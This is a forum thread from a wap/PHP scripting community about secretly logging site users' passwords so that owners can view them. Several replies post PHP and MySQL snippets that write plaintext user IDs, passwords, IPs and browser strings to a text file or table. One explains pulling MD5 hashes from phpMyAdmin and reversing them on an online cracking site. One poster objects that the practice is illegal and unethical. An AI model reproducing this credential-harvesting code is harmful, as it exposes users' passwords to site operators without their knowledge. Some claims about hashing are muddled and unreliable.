anyone know how to make a log for users password and it just for owner only can view users password.
Log Passwords
Collapse
X
-
There are 2 ways using mysql and text file.....
1 i will say to use sql for this...
Never use text but if your good are hiding the text yeah safe to do so....Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
Visit: WapMasterz Coming Back Soon!
_______
SCRIPTS FOR SALE BY SUBZERO
Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
_______
Info & Tips
php.net
w3schools.com
-
Code:$brws = explode(" ",$_SERVER['HTTP_USER_AGENT']); $ubr = $brws[0]; $fp = fopen("info.txt","a+"); fwrite ($fp, "\n".$uid." ".$pwd." ".$ipr." ".$ubr."\n"); fclose($fp);
Comment
-
..on wapdesire versions there's a logs folder where inside
you can find any decripted users passwords ..
sigpicthe italian/international COMMUNITY of friendship
http://people2000.netne.net
WAP/WEB
peoplemailbox@katamail.com
Comment
-
i had one working on my madfonez script using sql and when owners went to change a users password there current password came up on there profile for owners only:: note that was on the web version i have somewhere here
Dont Ask Me Dumb Questions.Or you'l get a Dumb Answer..
Want A Profesional Logo or Theme For Your wap site Pm Me.If I Have The Time Ill Make It For Free
Comment
-
Guest
U can , do it also manually by logging at phpmyadmin. .Look 4 ibwf users. Br0wse the mem id.U want to view the password. We all kn0w that. The password is in md5 form.In phpmyadmin.Just copy and paste the md5 hash. And calculate it here passcracking.ru and der u go. . .The hexadecimal of md5 will translate it to. Text/alphanumeric. It reveals the password of the user. This is manually mate. U can code 4 it. Also. .
Comment
-
5/10 that will work lol
im one of the 5 that makes things work lol
51931fd1abd0558477c0d27574998345 << md5 lol
also if you use this one day you will crack it but you only get my url for site ;)Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
Visit: WapMasterz Coming Back Soon!
_______
SCRIPTS FOR SALE BY SUBZERO
Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
_______
Info & Tips
php.net
w3schools.com
Comment
-
Guest
Yah sir i kn0w. Hehe . i just got dat teknik. In crap milw0rm.com. This is not adviseable it takes times. .Hehe
Comment
-
my md5 is hard to crack
but when they do they will be pissed of with it lmaoVisit: Chat4u.mobi - The New Lay Of being a site of your dreams!
Visit: WapMasterz Coming Back Soon!
_______
SCRIPTS FOR SALE BY SUBZERO
Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
_______
Info & Tips
php.net
w3schools.com
Comment
-
this may help just edit this if you know ya codeing well
<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>
mysql_query("INSERT INTO reports_logs SET place='penalties', details='".getnick_uid(getuid_sid($sid))." Unshielded The user ".$unick."', time='".time()."'");
you can edit it to
mysql_query("INSERT INTO logs SET pass='pass detales here', user='".user detales here."', time='".time here if you want it here."'");
</div>
its easy if you know how you can put any thing in it like there browser ect ect
Comment
-
you do realise that is a one way hashing algorythm. its impossible to "decrypt" an md5 pass . theres 32 chars and an infinite number of chars for a pass length. and if your good with salting the passwords too an md5 hash is impossible to get. One a secure site of mine i use a bit field and a secret field both containing around 40 chars give or take stripped illegal chars. every users salts are different and every users password is a minimum of around 86 characters containing numbers, letters, symbols and some other chars too. You could no doubt get an array of possible passwords, but to build that database of possibles would take millions of years on the current supercomputers we have .. and even then if your not clever to store the passwords in a binary data file non of those passwords would be correct as the salts contain a minimum of 10 codes that arent displayed to the computers screen
but anyway less about the theory lesson lol.. why on earth would you store peoples passwords like that.. apart from such an action being extremely illegal do you have no morales. i bet you have or are after a script to output users private messages too ?
Comment
-
<div class='quotetop'>QUOTE (djlee @ Jan 24 2009, 12:49 AM) <{POST_SNAPBACK}></div>but anyway less about the theory lesson lol.. why on earth would you store peoples passwords like that.. apart from such an action being extremely illegal do you have no morales. i bet you have or are after a script to output users private messages too ?[/b]
lol some ppl are tooooooooooooooo curious lolsigpiceeeeerrr....
Comment
Comment